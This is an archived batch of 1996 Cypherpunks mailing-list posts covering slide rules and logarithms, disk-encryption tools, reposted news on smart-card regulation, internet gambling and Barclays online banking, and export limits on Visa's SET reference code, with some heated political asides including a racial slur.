Message-ID: <199611010919.KAA04730@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:47 AM -0500 10/31/96, Rabid Wombat wrote:
>On Wed, 30 Oct 1996, Bill Frantz wrote:
>
>> Gee, I put that post in the same place I carefully keep my back issues of
>> the Cypherpunks Enquirer.
>> 
>
>Bill, you must be humor-impaired. That piece was a great send-up of 
>Woods. I was laughing 'til tears spilled down an shorted out my keyboard. 
>I dunno who posted that, but I'm in awe.

Thanks.

I know the author rather well, and he assures me he dashed off this
satirical piece in about as much time as he takes to write his normal
articles. He tells me that once he had "grokked" the inimitable (not) style
of Don Wood, it was easy to write a screed that echoed Wood's wackiness.

Of course, for people who read satire on this list, the initials at the end
are a clue. But don't publish who you think it is, as KVFP doesn't want a
lawsuit from Wood for hurting Wood's feelings.

--KVFP

--


--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 1 Nov 1996 10:29:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Sliderules, Logs, and Prodigies
In-Reply-To: <199610311716.JAA00988@crypt>
Message-ID: <v03007802ae9fed297e06@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:16 AM -0800 10/31/96, Hal Finney wrote:

>First I am going to write a little bit about the lore of logarithms.
>I think today a lot of people don't know what they are.  When I was a
>boy, in the 1960's, computers and even calculators were not widely
>available.  Yet engineers in many fields needed to perform
...
>By the time I was in high school calculators were becoming fairly
>widespread, but we still learned how to use log tables to do
>multiplication and division.  Whole books were published containing
>nothing but tables of the logarithms of numbers.  You can still find
>these sometimes in used book stores.  There were lots of tricks to

(These were the "Smoley" books, amongst others.)

Sliderules were just becoming common when I was in high school....

Seriously, only a very few of us had and used sliderules...mine was a big
synthetic K & E (Keuffel and Esser, as I recall). The raging "DOS vs. Mac"
or "RISC vs. CISC" debate of that age was "aluminum" (the yellow Dietzgens)
vs. the old standby, "bamboo." Plus some oddball circular sliderules.

Those of us who used sliderules were sometimes characterized as
"nerds"...perhaps this is why I today have such a strong reation to so many
young programmers and engineers voluntarily calling themselves "nerds" and
"geeks." (The deconstructive, postmodern theory is presumably that they are
"reclaiming" the term, as with dykes and niggers reclaiming those hateful
terms. I still reject this as crap.)

>It's hard for people today, raised on throwaway and even virtual
>calculators, to understand the sense of power that came from using
>logs for calculations.  Until we learned these advanced techniques the
>only accurate alternatives were the terribly tedious hand methods.
>Being able to get results by adding up a few numbers from a book was
>an amazing improvement.

And these tables were of course a major motivation for the development of
computers, going back centuries. Mechanical computation of log tables, and
even Babbage's work, was inspired by this. Ditto for artillery range
tables, some of the earliest applications of the earliest digital computers.

(Precomputation of values, aka "tabling," is of course still a modern
topic. Some of the newer names come out of AI, compiler research, etc. For
example, speculative execution. Not exactly a book of precomputed logs, but
similar.)

Recall that Fermi, von Neumann, and Feynman had a contest at Los Alamos in
WWII, with some problem being computed by Fermi on sliderule, von Neumann
on early versions of computers, and Feynman with log tables and adding
machines. Feynman won, as I recall the story, but presumably only because
von Neumann was not allowed to do it in his head.

(The funny story goes that a problem was going around Los Alamos that goes
like this: two trains are approaching each other on the same track, one
train going
60 mph and the other going 40 mph. When the trains are 100 miles apart, a
fly takes off from one train and flies 200 mph toward the other train, then
turns around and flies back at the same speed, and so on, until the trains
collide. How far does he fly? Von Neumann was asked this, glanced at the
ceiling, and gave the answer (left as an exercise for the reader). The
questioner said, "Oh, Dr. von Neumann, I'm glad you saw the trick and
didn't try to compute the infinite series." Von Neumann replied, "You mean
there's another way?")

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Doan <doan@cs.uregina.ca>
Date: Fri, 1 Nov 1996 09:00:13 -0800 (PST)
To: Edgar W Swank <edgarswank@juno.com>
Subject: Re: Encrypting Hard Disks
In-Reply-To: <19961031.190034.2918.8.edgarswank@juno.com>
Message-ID: <Pine.SGI.3.91.961101105829.13927B-100000@HERCULES.CS.UREGINA.CA>
MIME-Version: 1.0
Content-Type: text/plain


"Norton your eyes only" works well.

---Jason Doan
---doan@cs.uregina.ca

On Thu, 31 Oct 1996, Edgar W Swank wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> FCri Kaljundi wrote:
> 
> >  Tue, 22 Oct 1996, Michael B Amoruso kirjutas:
> >
> >> Are there any good programs out there that can encrypt my HD??  Since
> >> there probably are, please mention some and where I can get them. 
> Also,
> >> no one mention PGP.
> >
> >F-Secure Desktop from Data Fellows is pretty good. It uses Blowfish
> >algorithm which means it is very fast on 32-bit Windows machines.
> >
> >More information at http://www.datafellows.com/f-secure/
> 
> - - From a quick perusal of the above web site, it appears as though
> F-Secure Desktop offers encryption by file, much like PGP does, only a
> little more automatic.  But an entire encrypted file must be decrypted
> before you can process it and the entire file must then be
> re-encrypted if it is updated.
> 
> - - From http://www.datafellows.com/f-secure/desktop/
> 
>     With the built-in AutoSecure(TM) feature, you can define sets of
>     files, directories, and Windows 95 folders that will be
>     automatically encrypted and decrypted every time you start or
>     close Windows.
> 
> - - From this, it appears encrypted files are decrypted while windows is
> open. Obviously if Windows crashes a lot of plaintext files can be
> left lying around!
> 
> I prefer the methods of SecureDrive
> 
>   http://www.stack.urc.tue.nl/~galactus/remailers/securedrive.html
> 
> or Secure Device
> 
>   ftp://utopia.hacktic.nl/pub/replay/pub/disk/secdev14.arj
> 
> in which data is decrypted "on-the-fly" as it is transferred from
> disk to memory.  The data is -always- encrypted on the disk. Both of
> the above use strong IDEA encryption (same as PGP) and both are
> free for non-commercial use. (Commercial use is possible by paying a
> small royalty to the holders of the IDEA patent; see
> 
>   http://www.ascom.ch/systec
> 
> In contrast, F-Secure Desktop is $99 a copy.
> 
> Edgar W. Swank   <EdgarSwank@Juno.com>
>                  (preferred)
> Edgar W. Swank   <Edgar_W._Swank@ilanet.org>
> Edgar W. Swank   <EdgarSwank@Freemark.com>
> Home Page: http://members.tripod.com/~EdgarS/index.html
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMnjI9t4nNf3ah8DHAQHS0AP/WBYwqv2mJFJgBSIm9XUXMHPhi5WXSsXO
> YkOvyWh2XScQNLUhpYc91eaoJakBIsvREPDA5MIFa7CF3UmSKHagBNuoHxOuy3ZP
> x/eZpHykZyMrIzB/+eg65PFxo9ILaHMBog+qzTKqvCmAOGukegCzo3xbh1rpKswU
> P4WhnYvkQOo=
> =IGk8
> -----END PGP SIGNATURE-----
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alzheimer@juno.com (Ronald Raygun Remailer)
Date: Fri, 1 Nov 1996 08:12:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Eggregatious Copyright Violations
Message-ID: <19961101.101332.5575.0.alzheimer@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Smart Card Bulletin: October 1996
 
To Regulate or Not to Regulate? 
 
By Theodore Iacobuzio 
 
US banking regulators are seeking comment on whether, and under what
circumstances, it should take action over electronic money. 
 
Though US banking regulators are focusing more and more of their
attention
on smart cards, most insiders both at banks and at advocacy groups say
they
are not overly concerned with the degree of scrutiny the new technology
attracts. 
 
In fact, contradicting recent alarmist press reports, they told CI they
were
glad the federal government has decided to call for comment. Through a
process of public hearings and forums beginning last month, two powerful
federal agencies sought to air important regulatory issues involving all
aspects
of electronic money, with a special emphasis on smart cards as among the
most mature technologies. 
 
It is all part of an effort to find out more about the new payment system
now,
rather than later, when it is up and running. This way, according to the
government, the industry can both educate the regulators and address
their
concerns before the market has become too established to change easily. 
 
"The regulatory agencies are actually working quite well to understand
the
technology and not to rush to regulate," said Catherine Allen, president
of the
Santa Fe Group, a New Mexico-based electronic commerce think-tank and
the former head of Citicorp's smart card initiative and board member of
the
Smart Card Forum. 
 
"The hearings are being held to get the issues into the open," Allen
said. "I
don't sense heightened concern from the industry." 
 
In fact, many smart card insiders more suspicious than Allen were
considerably mollified having heard Treasury Secretary Robert Rubin
address an agency-sponsored forum on electronic money on September 19. 
 
The forum, which attracted some of the nation's top bankers, concentrated
heavily on smart cards. In his keynote speech, Rubin explicitly sought to
restrict government's role in the new technologies to issues of law
enforcement: fraud, money-laundering and privacy.
 
"As we think about these concerns, let us put aside our ideological views
with
respect to regulation and take an intensely practical approach to finding
the
right balance so that we can minimise impediments to growth and at the
same
time meet the needs that I just described," Rubin said. 
 
"It seems to me that as we look at the benefits and ask the questions, we
must achieve two objectives at the same time: minimising impediments to
the
growth of electronic money, but at the same time, address the difficult
issues
it raises in an appropriate fashion. 
 
"To some extent, there may be trade-off judgements that will have to be
made, but I believe to a large extent the meeting of these two objectives
will
be complementary." 
 
Rubin said that electronic money should increase, rather than decrease,
access to financial services and the mainstream economy for those in the
inner cities or poor rural areas. 
 
"This is a great challenge and I think an absolutely critical challenge
given 
that these groups lack access to computers, financial services and many
of the
benefits of our modern economy". But his comments were so vague as to
limit any discussion of possible US government intervention. 
 
While the Treasury Department meeting was also notable for Citicorp
chairman John Reed's assertion that the Internet is not yet secure enough
for
banking transactions, its major effect was to reassure most smart card
insiders not to expect any aggressive move by the US government to
regulate
smart cards. 
 
On the contrary, they felt the federal government's hitherto hands-off
approach is a textbook example of how regulation of a new technology
should proceed. 
 
The latest efforts at regulatory clarification come not from the Treasury
Department, but from the Federal Deposit Insurance Corporation (FDIC),
the US banking agency established during the Great Depression that both
insures bank deposits of up to $100,000 and oversees the safety and
soundness of banking practices. 
 
The agency has sought comment on whether the funds underlying smart cards
are deposits and hence insurable under the law. It has also issued its
own
opinion that for most purposes, funds underlying smart cards are not in
fact
insurable. 
 
So eager is the FDIC to air the issue, that it took the unusual step (for
a bank
regulatory body) of calling a public hearing on September 12 in
Washington. 
 
There, banks, technology vendors, card associations and industry groups
aired their opinions. And indeed, most of the bankers commenting pleaded
with the government to let the market grow before imposing any kind of
rigid
regulatory structure. 
 
The Federal Reserve Board raised a thornier issue when it recently sought
comment on its effort to exempt from Regulation E those stored- value
cards
bearing less than $100 in value. Reg E, as it is called, establishes
banks'
responsibility for providing an audit trail for money moving through the
electronic funds process. 
 
"This is sort of technical bank-lawyer stuff that people are going to
have to
know about but that is going to have very little effect on how the market
develops as a whole," said John Wright, vice president and senior counsel
with Wells Fargo Bank and head of the legal and public affairs policy arm
of
the Smart Card Forum, the leading industry advocacy group. Regarding the
FDIC request for comment, he said:"It depends how you structure it. I
dont
think that at the level of what consumers are going to do, they would be
deposits." 
 
Wright added that as it was proposed, he did not think the Reg E piece
represented something people ought to worry about.
 
 


New York Times: Monday, October 28, 1996
 
Regulators Vexed By Gambling Over Internet 
 
By JAMES STERNGOLD
 
There are few patches of legal turf the states guard more fiercely than
gambling, which is why it seemed strange this summer when the National
Association of Attorneys General urged the federal government to seize
control of wagering on the Internet -- even though hardly anyone was
doing
it. 
 
Even more bizarre was that the recommendation, including an alarming
proposal for arresting gamblers from in front of their computers, was
turned

down by the Justice Department.
 
``The department does not agree that federal law should be amended so
broadly as to cover the first-time bettor who loses $5, particularly when
Internet gaming is expected to mushroom and federal resources are
shrinking,'' John C. Keeney, an official in the criminal division at the
Justice
Department, wrote the states. 
 
The episode highlighted the growing anxiety and confusion over one of the
least developed, but potentially most vexing areas of Internet business -
gambling. The reach of the World Wide Web is erasing not only borders but
also the ability of the authorities to control wagering (not to mention
their
ability to tax it). And gambling over computer networks is still new
enough
that it remains unclear exactly what is legal and what is not. 
 
``We built it to be Russian-proof, but it turned out to be regulator
proof,''
said Craig I. Fields, the former head of the Pentagon agency that helped
create the Internet during the cold war, and who is now vice chairman of
Alliance Gaming, a Las Vegas concern developing on-line gambling.
 
In principal, gambling by computer sounds promising, placing an
increasingly
popular habit, which can quickly become a compulsion for some
individuals,
within just about anyone's reach. Indeed, nearly every worker in the
country
with a personal computer and a few minutes to spare will soon be able to
slip
in some blackjack, poker, slots or baccarat for money at almost
completely
unregulated, virtual casinos. 
 
To give some notion of the potential, Americans wagered $550 billion last
year at traditional operations, from lotteries and horse races to bingo
and
casinos, and gambling companies had revenues of $44.4 billion. The
Internet
operators need to take only a fraction of that business to produce
explosive
growth - or explosive scams. 
 
``In my view, gambling is the fastest way to destroy the credibility of
the
Internet system,'' said John Kindt, an economics professor at the
University
of Illinois at Champlain and a gambling critic. ``If you lose you'll
lose, and 
if you win you could lose because there's no way to collect from these
offshore
operations.'' 
 
He added that with personal computers now ubiquitous the on-line casinos
could prove a devastating temptation for the growing numbers of
compulsive
gamblers. ``People will be trapped,'' Kindt said. ``They won't be able to
get
away from it.'' 
 
All that is driving some law enforcement officials crazy, especially
since the
business, though made up of a tiny number of marginal companies operating
from offshore havens like Antigua, Belize and Monaco, is on the cusp of a
major expansion. A showdown, in short, is looming in the one area of the
Internet that may well produce billions of dollars of commerce in just a
couple of years. 
 
Minnesota has sued Granite Gate Resorts, a Las Vegas company preparing
to offer sports betting on-line, called Wager Net, as a test case,
claiming that
it is a consumer fraud because the service says, improperly, it is legal.
The
state court hearing the suit has yet to rule on whether the state has
jurisdiction. 
 
California is attacking by threatening the telephone companies with
prosecution if they do not cut off service to Internet gambling concerns
in the
state. 
 
Several states are also insisting that they will not recognize the use of

offshore
sites if the companies are attracting American gamblers. ``We're going to
take an aggressive stand on this and we'll interpret the law as broadly
and
prohibitively as we can, and there will be no havens,'' said Tom Gede, a
special assistant to the attorney general of California. 
 
Sen. Jon Kyl, R-Ariz., offered a bill earier this year that would have
made all
Internet gambling explicitly illegal. Although it was killed in
committee, he 
has insisted he will offer it again. A National Gaming Commission was
established
by the Congress this year and a big focus of the study it will be
conducting
will be on-line wagering, which could also lead to legislation. 
 
And there is an even trickier issue, some believe. 
 
``There's another I-word that really scares the government, Indian
gambling,''
said I. Nelson Rose, a professor at the Whittier Law School here and a
gambling law expert. ``If the Indian tribes get involved in this then the
way 
the law is written all sorts of sports betting and other kinds of on-line
betting
could take place from Indian lands in an unregulated fashion.'' 
 
That has left many state officials worried, but unwilling to just wait
for the
explosion. 
 
``The federal government is either going to want to get into it now or
they'll
be drawn into it later,'' insisted Hubert Humphrey III, the attorney
general of
Minnesota and a prime mover behind the request this summer for federal
involvement. ``This is moving so fast that we have to get out in front of
it.'' 
 
All these worries are over a business that is, at the moment at least,
underwhelming. Sue Schneider, managing editor of Rolling Good Times
On-Line, an e-zine that tracks the industry, said that there are fewer
than a
half dozen virtual casinos that are taking real bets at the moment, and
many of
the games are frustratingly slow. There are also unresolved concerns over
the
security of on-line transactions and whether an unlicensed casino would
maintain fair odds on the games. 
 
In fact, the established casino companies, while watching warily, appear
unfazed. ``My personal view is it's not very interesting,'' said Stephen
Bollenbach, chief executive of Hilton Hotels, the country's largest
casino
concern. ``It's a different business than we're in.'' 
 
Nevertheless, about 40 prospective operators have set up Web sites and
many offer games that, at some point in the future, could easily be
transformed into gambling for real money. 
 
Ms. Schneider said that as many as a dozen more on-line casino or
bookmaking operations may open for business within the next few months. 
 
While all the companies are seeking essentially the same thing - to get
into the
lucrative gambling business without the costs of building casinos or
having to
pay dealers or other high-priced staff - they are taking many different
approaches because of the murky legal status of the business and the
uncertainty over just who will really want to spend their money this way.

 
Virtual Vegas is one of the more active on-line casinos, and one of the
most
cautious. The company's formula is simple: treat Internet gambling as
another
type of computer game, and leave the money out of it for now to avoid
hassles with the police. 
 
David Herschman, chief executive of the company, which is based in the
hip
Venice district of Los Angeles, said Virtual Vegas had already spent $3
million developing its technology, and would spend another $10 million. 
 
It has created twists on traditional games to make them more like
computer
games, and therefore more appealing to the people who already spend
perhaps more time than they should in front of their personal computers.
Virtual Vegas offers Turbo Black Jack and Assault Poker, which is like
combining Doom and five card stud. Virtual Vegas will be available on
Time
Warner's cable on-line service. 
 
Peter Demos Jr., president of World Wide Web Casinos, which is based in
Orange County, said his company had decided to trust the idea that having
an offshore computer location will keep it out of jail. World Wide Web

Casinos has acquired a tiny casino on Antigua, the St. James Club. ``It
does
provide us with a little credibility,'' Demos said. 
 
He added: ``We want to be a huge grind joint. We're not going to attract
high
rollers. We're looking for someone who will blow $20 or so in an hour and
a
half.'' World Wide Web Casino, which will offer black jack, five kinds of
video poker and slots, is in testing and hopes to open around
Thanksgiving. 
 
Internet Gaming Technologies Inc., based in San Diego, is also using an
offshore strategy: It has a gambling license in Ecuador, acquired through
a
company registered in Monaco. 
 
Joseph R. Paravia, president of the company, said he is less confident in
the
offshore loophole, so the company will offer its games only to people
outside
the United States, which he insisted is technically feasible. Paravia
said the
company plans to pursue known gamblers, giving them computers if
necessary. ``We didn't want to take a propeller-head and have to teach
him
how to gamble,'' Paravia said. ``We want to go after a known market.'' 
 
You Bet International Inc., however is what might be called an
anti-Internet
Internet gambling company. The company, which will operate through the
New York Racing Association, offers a horse race bookmaking service that
makes only tangential use of the Internet: to register accounts and
download
software. 
 
``The Internet as it exists is the wrong place for this kind of
application,'' 
said Stephen A. Molnar, executive vice president of the company. ``The
biggest
problem is political. We believe that at some point the government is
going to
come down on this.'' 
 
You Bet, which expects to begin taking bets in February 1997, has
constructed a private on-line service over which its account holders will
get
information and place their wagers. And it appears to be legal, since it
operates within New York state parimutuel betting laws.
 
``It's all interesting, but most of what is being bandied about is hocus
pocus 
at
this point,'' said Jason Ader, an analyst with Bear Stearns & Co. ``It's
a very
scary situation. There's no regulation. There's tremendous potential for
abuse
out there, and maybe a little fun until then.'' 
 
 




News Release (NationsBank): Friday, October 25, 1996
 
NationsBank Announces Service For Trading New And
Used Stored Value Cards 
 
Antiques are too dusty. Model cars are old news. The hot collectible
today?
Stored Value Cards. 
 
NationsBank (NYSE: NB) today announced it will establish a collector
service to support an open, free and knowledgeable marketplace for
buying,
selling and trading new and used NationsBank Stored Value cards. 
 
"Many of our customers have told us that they wanted to collect our
stored
value cards," said Richard F. Shaffner, NationsBank Senior Vice
President.
"We want to respond by providing a professional service that our
customers
and the marketplace can count on for accurate information regarding the
production and availability of new and used NationsBank cards." 
 
The NationsBank Collector Service will provide a variety of services to
collectors: 
 
-- information about NationsBank cards and designs; 
 
-- card reproductions; 
 
-- information about how and where new and used cards may be purchased.
 
The service will also facilitate the sale of new and expired NationsBank
cards
to dealers and collectors. 
 
The bank has also established a set of Stored Value Card Principles that
it
plans to follow in producing and distributing its stored value cards. 
 
"NationsBank was the first bank in the United States to introduce VISA
Cash to the public in 1995, and now is the first card issuer to establish
and
communicate principles designed to protect customers who are card
collectors," said Shaffner. 
 
NationsBank Stored Value Cards provide customers the opportunity to
collect the first samples of an entirely new payment system.
 
The cards include the first VISA Cash card, the series of commemorative
VISA Cash cards from the 1996 Summer Olympic Games, and the
FANCash cards introduced by NationsBank at the 1996 Carolina Panthers
home games. 
 
"These cards are generating a great deal of interest among collectors,"
said
Shaffner. "Some $5 cards are already trading for as much as $300. We want
to make sure that card collectors know that NationsBank's principles for
the
collection of stored value cards are solid and well thought-out." 
 
NationsBank's principles for the issuance of stored value cards state the
bank's position regarding the availability, production, and the
dissemination of
information about each card design. 
 
NationsBank Card Services, with more than $8.3 billion in outstanding
loans,
is the llth largest issuer of Visa and Mastercard credit cards. 
 
NationsBank is the fifth-largest banking company in the U.S. with primary
retail operations in nine states and the District of Columbia. As of
September
30, 1996, NationsBank had total assets of $188 billion. 
 
 


 
Sunday Times (London): October 27, 1996
 
Banks Move into Online Robbery 
 
By David Hewson 
 
There are only two things you can guarantee of a British clearing bank.
First,
that avarice will be its primary motivating force. And second, that it
will
pursue this avarice with such naked stupidity that a three-year-old could
spot
it with his eyes closed. 
 
The announcement that Barclays has decided to enter the world of online
banking is a case in point. 
 
In principle, the idea of handling your finances through a home PC is an
interesting one. Provided the security is tight and there are enough
advantages
to justify the time online, I might even try it myself. But, not in
several 
million
years, the way Barclays has the cheek to suggest. If you want to join the
game, here is what the bank demands that you -- the customer, if I am not
mistaken - will need. First, a computer capable of running Windows 95 --
#1,000 will do nicely if your otherwise adequate 3.1 machines is not up
to
snuff. Second, a modem. Third, a copy of Microsoft Money 97 -- #29.99,
thanks very much. And fourth, a benign desire on your part to save
Barclays
internal transaction costs by doing the work yourself and adding the
ensuing
phone charges, probably long distance, to your BT bill. 
 
And what do you get in return? Well, you can check balances, transfer
money between accounts, settle bills and change standing orders -- all of
which is already possible through 24-hour, voice-based phone banking down
an ordinary line, for a local-call charge, and with someone who is paid
to tap
the keyboard. 
 
Oh, yes. You can also "analyse and display account history using the
in-built
graphics packages". Oh joy. Forget Doom. Let's watch the gas bill turn
from
bar graph to pie chart, all with a click of the mouse. So now you know
why
you bought a home PC... 
 
If more than a thousand or so deluded souls sign up for this package of
dross
I will be truly surprised. The general public may be happily ignorant of
the
more obscure parts of the personal computing world but they do understand
that there are just two reasons to run financial matters on a home PC. It
has
to make life easier, and it must extend your choice. 
 
All Barclays offers over 24-hour phone banking is the marginal curiosity

value of transferring your account information straight into a
personal-finance
package. And in return? You are locked into them with a proprietary
communications package that works with no other bank, and one, moreover,
that forces you to pay the Microsoft tax -- for Money 97 and Windows on
top. 
 
It is difficut to decide whether this is pure ignorance or simply
misguided
greed on Barclays' part. Even the banking industry must have heard of the
Internet. The ostensible reason Barclays has eschewed the Net is that it
is
inherently insecure. This is rather like saying aircraft are inherently
prone to
crash, regardless of how well they are maintained or flown. 
 
There is clear proof that the Net can be made sufficiently secure simply
in the
huge number of American banks now racing to open online services. Take a
look at the beautifully organised Bank of America service
(www.bankamerica.com) and judge for yourself. 
 
What's more, Net banking activities run through a Web browser, can talk
to
Microsoft Money as well as the more popular Intuit Quicken in ex actly
the
same way as Barclays' proprietary code. You get all the bar charts of
your
Visa bills and lose those leg-irons along the way. 
 
Only a bank could believe that it is offering some added value by
allowing
you access to your own money through a PC. The real service online
banking
will offer is beyond the understanding of Barclays. 
 
One day the Net will act as an active, independent, intelligent agent of
choice.
It will shop around for the cheapest loans, mortgages and savings
accounts
across a broad spectrum of providers. The inertia selling of bill-paying,
insurance and other financial services that featherbeds the clearing
banks
today will be gone once you find the magic button marked "Find
cheapest..."
on your Net browser. 
 
Barclays would do well to try to work out how it will survive in that
newly
competitive era instead of trying to enslave further its hapless, captive
customers just as the walls that imprison them start to come down. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 1 Nov 1996 11:26:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: perrygram
In-Reply-To: <v03007801ae9f73686609@[207.167.93.63]>
Message-ID: <uu3PwD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:

> At 1:30 AM -0600 11/1/96, snow wrote:
> >Mr. Hassen wrote:
> >> But remember people are NOT sheep and nothing
> >> lasts forever.
> >
> >     Yes, they are, and death does.
> >
> >     Loans to third world counties are made (obstensively) to help industry
> >and farming to be developed, and to improve the conditions of the people. It
> >rarely works that way, and I think it is a wasted effort, but it is better
> >than nothing.
> 
> We mine the copper they have no money to mine and pay them with worthless
> trinkets like penicillin, schools, and roads.
> 
> We are exploiting them.
> 
> Yep, they are better off in a state of natural grace, eating grubs and with
> a life expectancy of 35.
> 
> 
> --Tim May


What is the cryptographic relevance of the above-quoted piece?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 1 Nov 1996 11:09:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: ITAR restricts Financial Cryptography
Message-ID: <199611011908.LAA20178@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Just in case anyone still thinks that the ITAR doesn't interfere with the
use of cryptography to protect financial systems from fraud, here is a data
point.

>From Robert Hettinga's e$pam list quoting the set-discuss list:

-----------------------------------------------------------------------
From: "Lewis, Tony" <tlewis@visa.com>
 To: "'set-announce'" <set-announce@commerce.net>,
         "'set-discuss'"
         <set-discuss@commerce.net>
 Subject: Reference code availability update
 Date: Thu, 31 Oct 1996 21:06:34 -0800
 Encoding: 14 TEXT
 Sender: owner-set-talk@commerce.NET
 Precedence: bulk


+----------------------------------------------------+
 Addressed to: set-discuss@commerce.net
 +----------------------------------------------------+
 
 At the SET Open Vendor Meeting, MasterCard and Visa announced that a SET
 reference implementation would be made available. Unfortunately,
 producing the reference code has taken longer than we planned. Our
 current plan is to have it ready by the end of November, 1996.
 
 Because of U.S. export regulations, it will not be possible for us to
 post the reference code for download. Individuals and companies that
 want a copy of the reference code will need to request it. The
 procedures for making such a request will be announced here in
 approximately one week.
 _________________________________________________________________
 Tony Lewis (tlewis@visa.com)
 Chief Systems Architect, Internet Commerce
 Visa International Service Association
 ------------------------------------------------------------------------
 This message was sent by set-discuss@commerce.net.  For a complete listing
 of available commands, please send mail to 'majordomo@commerce.net'
 with 'help' (no quotations) contained within the body of your message.
 

-------------------------------------------------------------------------
Bill Frantz       | Tired of Dole/Clinton?     | Periwinkle -- Consulting
(408)356-8506     | Vote 3rd party.  I'm       | 16345 Englewood Ave.
frantz@netcom.com | Voting for Harry Browne    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Fri, 1 Nov 1996 11:38:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Montgolfiering Spoof
In-Reply-To: <199611010919.KAA04730@basement.replay.com>
Message-ID: <dBley8m9LgDZ085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199611010919.KAA04730@basement.replay.com>,
nobody@replay.com (Anonymous) wrote:

> I know the author rather well, and he assures me he dashed off this
> satirical piece in about as much time as he takes to write his normal
> articles. He tells me that once he had "grokked" the inimitable (not) style
> of Don Wood, it was easy to write a screed that echoed Wood's wackiness.
> 
> Of course, for people who read satire on this list, the initials at the end
> are a clue. But don't publish who you think it is, as KVFP doesn't want a
> lawsuit from Wood for hurting Wood's feelings.
> 
> --KVFP

You don't fool us one bit, Detweiler.

-- 
Alan Bostick               | "Dole is so unpopular, he couldn't sell beer on
mailto:abostick@netcom.com | a troop ship." (Ohio Republican Senator William
news:alt.grelb             | Saxbe on Bob Dole's early career in the Senate)
http://www.alumni.caltech.edu/~abostick
http://www.theangle.com/  The first site with a brain.  Yours.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 1 Nov 1996 09:53:27 -0800 (PST)
To: Hard Media <zaid@hardnet.co.uk>
Subject: Re: 'what cypherpunks is about'
In-Reply-To: <v01520d00ae9faaa2a4be@[158.152.61.59]>
Message-ID: <Pine.BSF.3.91.961101114113.1583A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


If you have an interest in this, you might want to read "In Banks we 
Trust" by Penny Lernoux. Getting a bit dated, as it was written in the 
early '80's, as I recall, but relevant background info.
-r.w.

On Fri, 1 Nov 1996, Hard Media wrote:

> 
> Oh Oh. I said bad things about Americans...in trouble now.
> 
> Anyways. Here are some figures:
> 
> "In the 20 year period between 1970 and 1989, the external debt of
> developing nations grew from
> $68.4 billion to $1 283 billion, an increase of 1846 per cent. Debt service
> payments increased by 1400 per cent and were in excess of $160 billion by
> the end of the 80s."
> 
> by the way most of this debt is concentrated in South American.
> 
> 
> Zaid
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Fri, 1 Nov 1996 09:10:27 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: RE: 'what cypherpunks is about'
Message-ID: <9610018468.AA846878187@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


At 1:30 AM -0600 11/1/96, snow wrote:
[Re: loans to third world countries]
>     I think it is a wasted effort, but it is better than nothing.
 
"Timothy C. May" <tcmay@got.net> wrote:
Yep, they are better off in a state of natural grace, eating grubs and with a
life expectancy of 35.
 
If seems to me that these discussions are revealing more information about the
message authors than about the topic under discussion.
 
Since we have referred to the supremacy of natural tendencies in many of these
messages, I find it somewhat ironic that we would not want to leave them with a
life expectancy of 35. Evolution and natural selection tends to work faster if
the population experiences rapid turnover. In this regard, extending the life of
individuals is a bad thing for the fitness of the population as a whole.

This seems to me to be yet another example of people's poor ability to estimate
probabilities in a rational and objective way.
 
Most animals sensate (grow old). This is necessary for natural selection to work
on the gene pool. If we manage to eliminate this feature of our existence, we
may become like one of the few species that do not sensate; lobsters for
example.
 
I live confident in the knowledge that my death is necessary to make way for
progress.
 
James
 
Chance
 
If chance be 
the father of all flesh
disaster is his rainbow in the sky
and when you hear
 
State of Emergency!
Sniper Kills Ten!
Troops on Rampage!
Whites go Looting!
Bomb Blasts School!
 
It is but the sound of man
worshipping his maker.
 
Steve Turner







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Fri, 1 Nov 1996 03:17:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: WWII & Japan
In-Reply-To: <199611010610.AAA03470@einstein>
